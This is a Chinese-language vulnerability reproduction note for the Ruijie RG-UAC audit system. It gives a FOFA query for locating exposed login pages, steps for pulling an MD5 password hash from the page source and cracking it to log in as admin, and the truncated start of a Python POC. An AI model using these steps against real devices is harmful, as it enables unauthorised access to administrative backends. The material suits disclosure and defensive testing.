0x01 漏洞描述
锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台
0x02 漏洞影响
锐捷RG-UAC统一上网行为管理审计系统
0x03 漏洞复现
使用FOFA语句包含关键字查找FOFA语句
title="RG-UAC登录页面" && body="admin"
登录界面
直接CTRL+U查看源代码,搜索password
https://www.somd5.com/ 解密MD5加密的password
即可使用admin,密码登录进系统后台
POC:
import requests
import sys
import random
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
print('+------------------------------------------')
prin